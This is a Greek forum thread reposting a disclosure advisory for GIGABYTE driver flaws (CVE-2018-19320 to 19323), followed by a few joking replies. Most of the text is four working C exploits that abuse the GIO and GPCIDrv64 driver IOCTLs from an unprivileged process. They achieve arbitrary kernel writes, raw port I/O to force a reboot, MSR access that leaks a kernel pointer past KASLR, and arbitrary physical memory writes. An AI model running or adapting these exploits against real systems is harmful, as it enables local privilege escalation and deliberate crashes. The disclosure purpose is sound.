#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MemCpyStruct {
	ULONG64 dest;
	ULONG64 src;
	DWORD size;
} GIO_MemCpyStruct;

#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
	GIO_MemCpyStruct mystructIn = { dest, src, size};
	BYTE outbuffer[0x30] = { 0 };
	DWORD returned = 0;

	DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), & returned, NULL);
	if (returned) {
		return TRUE;
	}
	return FALSE;
}

BOOL InitDriver()
{
	char szDeviceNames[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n", szDeviceNames, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	if (!InitDriver()) {
		exit(0);
	}
	printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
	printf("press ENTER for instant BSOD\n");
	getchar();
	ULONG64 data = 0xFFFF1111FFFF2222;
	GIO_memcpy(0, (ULONG64)&data, 8);
	CloseHandle(ghDriver);

	return 0;
}     

Port mapped I/O access

Proof of Concept:


// GIGABYTE PoC demonstrating non-privileged access to IO ports

// This harmless PoC only reboots the PC, much more sinister stuff 
// would also be possible by abusing this functionality.

#include <windows.h>
#include <stdio.h>

// for \\.\GPCIDrv64
#define IOCTL_GPCIDRV_PORTREADB 0x9C402588
#define IOCTL_GPCIDRV_PORTWRITEB 0x9C40258C

// for \\.\GIO
#define IOCTL_GIO_PORTREADB 0x0C3506404 
#define IOCTL_GIO_PORTWRITEB 0x0C350A440

HANDLE ghDriver = 0;

typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);

#pragma pack (push,1)

typedef struct  {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnPMIOReadB pPMIOReadB;
	fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

typedef struct _GPCIDRV_PORTIO_STRUCT {
	DWORD port;
	ULONG64 value;
} GPCIDRV_PORTIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	BYTE outbuffer[0x30] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

BYTE GPCIDrv_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTREADB, 10)
}

BYTE GPCIDrv_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value};
	IOCTLMACRO(IOCTL_GPCIDRV_PORTWRITEB, 10)
}

BYTE GIO_PMIOReadB(WORD port)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, 0 };
	IOCTLMACRO(IOCTL_GIO_PORTREADB, 4)
}

BYTE GIO_PMIOWriteB(WORD port, BYTE value)
{
	GPCIDRV_PORTIO_STRUCT  inbuffer = { port, value };
	IOCTLMACRO(IOCTL_GIO_PORTWRITEB, 5)
}

void Reboot()
{
	BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
	gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
	Sleep(50);
	gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
	Sleep(50);
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i+1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
		break;
	}

	switch (gConfig.DriverIndex) {
		case DriverEnum::GPCIDrv64:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GPCIDrv_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GPCIDrv_PMIOWriteB;
		}
		break;

		case DriverEnum::GIO:
		{
			gConfig.pPMIOReadB = (fnPMIOReadB)GIO_PMIOReadB;
			gConfig.pPMIOWriteB = (fnPMIOWriteB)GIO_PMIOWriteB;
		}
		break;

		default:
			break;
	}


	return gConfig.DriverIndex ? TRUE : FALSE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (PMIO access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver);

	Reboot();
	return CloseHandle(ghDriver);
}        

MSR Register access

Proof of Concept:


// GIGABYTE GIO driver PoC demonstrating non-privileged access to MSR registers

// This PoC demonstrates non privileged MSR access by reading 
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MSRACCESS 0x0C3502580

HANDLE ghDriver = 0;

#pragma pack (push,1)

typedef struct _GIO_MSRIO_STRUCT {
	DWORD rw;			// 0 read - 1 write
	DWORD reg;			// 
	ULONG64 value;		// 
} GIO_MSRIO_STRUCT;

#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[1];	\

ULONG64 GIO_RDMSR(DWORD reg)
{
	ASIO_MSRIO_STRUCT inbuffer = { 1, reg };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
	ASIO_MSRIO_STRUCT inbuffer = { 0, reg, value };
	ULONG64 outbuffer[2] = { 0 };	
	IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

BOOL InitDriver()
{
	char szDeviceName[] = "\\\\.\\GIO";
	ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (ghDriver == INVALID_HANDLE_VALUE) {
		printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
		return FALSE;
	}
	return TRUE;
}

int main(int argc, char* argv[])
{
	printf("GIGABYTE PoC (MSR access) - pnx!/CORE\n");
	
	if (!InitDriver()) {
		printf("InitDriver failed! - aborting...\n");
		exit(0);
	}

	ULONG64 a = GIO_RDMSR(0xC0000082);
	printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
	printf("press ENTER for instant BSOD\n");
	getchar();
	a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
	return CloseHandle(ghDriver);
}       

Arbitrary physical memory read/write

Proof of Concept:


// GIGABYTE PoC (arbitrary physical memory read/write)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MAPPHYSICAL	0xC3502004
#define IOCTL_GIO_UNMAPPHYSICAL 0xC3502008

#define IOCTL_GPCI_MAPPHYSICAL	 0x9C402580
#define IOCTL_GPCI_UNMAPPHYSICAL 0x9C402584

HANDLE ghDriver = 0;

typedef ULONG64(*fnMapPhysical)(ULONG64 physicaladdress);
typedef ULONG64(*fnUnMapPhysical)(ULONG64 address);

#pragma pack (push,1)

typedef struct _GIO_PHMAP {
	DWORD InterfaceType;
	DWORD Bus;
	ULONG64 PhysicalAddress;
	DWORD IOSpace;
	DWORD size;
} GIO_PHMAP;

typedef struct _GPCI_PHMAP {
	DWORD PhysicalAddress;
	DWORD size;
} GPCI_PHMAP;

typedef struct {
	DWORD DriverIndex;		// DriverEnum index
	BYTE DeviceName[MAX_PATH];
	fnMapPhysical pMapPhysical;
	fnUnMapPhysical pUnMapPhysical;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
	GPCIDrv64 = 1,
	GIO,
};

#pragma pack(pop)


#define IOCTLMACRO(iocontrolcode) \
	ULONG64 outbuffer[2] = { 0 };	\
	DWORD returned = 0;	\
	DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, sizeof(inbuffer), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);	\
	return outbuffer[0];	\

ULONG64 GIO_mapPhysical(ULONG64 physicaladdress)
{
	GIO_PHMAP inbuffer = { 0, 0, physicaladdress, 0, 0x1000};
	IOCTLMACRO(IOCTL_GIO_MAPPHYSICAL)
}

ULONG64 GIO_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GIO_UNMAPPHYSICAL)
}

ULONG64 GPCI_mapPhysical(DWORD physicaladdress)
{
	GPCI_PHMAP inbuffer = { physicaladdress, 0x1000};
	IOCTLMACRO(IOCTL_GPCI_MAPPHYSICAL)
}

ULONG64 GPCI_unmapPhysical(ULONG64 address)
{
	ULONG64 inbuffer = address;
	IOCTLMACRO(IOCTL_GPCI_UNMAPPHYSICAL)
}

BOOL InitDriver()
{
	char *szDeviceNames[] = { "\\\\.\\GPCIDrv64" , "\\\\.\\GIO" };
	BYTE i = 0;
	for (i = 0; i < 2; i++) {
		ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if (ghDriver == INVALID_HANDLE_VALUE) {
			printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
			continue;
		}

		gConfig.DriverIndex = i + 1;
		memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
		break;
	}

	switch (gConfig.DriverIndex) {
	case DriverEnum::GPCIDrv64:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GPCI_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GPCI_unmapPhysical;
	}
	break;

	case DriverEnum::GIO:
	{
		gConfig.pMapPhysical = (fnMapPhysical)GIO_mapPhysical;
		gConfig.pUnMapPhysical = (fnUnMapPhysical)GIO_unmapPhysical;
	}
	break;

	default:
		break;
	}

	return gConfig.DriverIndex ? TRUE : FALSE;
}


int main(int argc, char * argv[])
{
	if (!InitDriver()) {
		exit(0);
	}

	printf("GIGABYTE PoC (arbitrary physical memory read/write) - pnx!/CORE\n");
	printf("press ENTER for System CRASH\n");
	getchar();
	printf("Bruteforcing");
	for (unsigned int i = 0; i < 0xffffffff; i+=0x1000) {
		printf(".");
		ULONG64 mappedVA = gConfig.pMapPhysical(i);
		*(ULONG64 *)mappedVA = 0xCCCCCCCCCCCCCCCC;
		gConfig.pUnMapPhysical(mappedVA);
	}
	CloseHandle(ghDriver);
	return 0;
}       

Vulnerability Information

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes

CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

Δεν βαρέθηκες βρε μπαγάσα να γράφεις ένα σεντόνι κώδικα για ένα local exploit ? 

Εγώ τα κατάλαβα όλα.Λιγο μου ξέφυγε η αρχή , η μέση και το τέλος. Κατά τα άλλα , ήσουν πολύ κατατοπιστικός.Ευχαριστω, αλλά μήπως μπορείς να μου τα ξαναπείς , για να τα μάθω καλύτερα ??

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

4 λεπτά πριν, jimagas99 είπε

Τώρα αμέσως πάω να κάνω μήνυση.Και θα ακολουθήσει και αγωγή , γιατί ως γνωστόν ,την κάθε Gigabyte , την πονάει μόνο η τσέπη. Επίσης ..  " πάρε το 100"  , 

- " Τι τηλέφωνο έχει ;"

Ρε τι μου θυμίζει , τι μου θυμίζει ????

Εγώ τα κατάλαβα όλα.Λιγο μου ξέφυγε η αρχή , η μέση και το τέλος. Κατά τα άλλα , ήσουν πολύ κατατοπιστικός.Ευχαριστω, αλλά μήπως μπορείς να μου τα ξαναπείς , για να τα μάθω καλύτερα ??

Να υποθέσω ότι δεν διάβασες τις τελευταίες γραμμές του post. :)

20 ώρες πριν, htaccess είπε

Remotely Exploitable: No
Locally Exploitable: Yes

CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

Δεν βαρέθηκες βρε μπαγάσα να γράφεις ένα σεντόνι κώδικα για ένα local exploit ? 

 

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε για να σχολιάσετε

Πρέπει να είστε μέλος για να αφήσετε σχόλιο

Δημιουργία λογαριασμού

Εγγραφείτε με νέο λογαριασμό στην κοινότητα μας. Είναι πανεύκολο!

Δημιουργία νέου λογαριασμού

Σύνδεση

Έχετε ήδη λογαριασμό; Συνδεθείτε εδώ.

Συνδεθείτε τώρα
  • Δημιουργία νέου...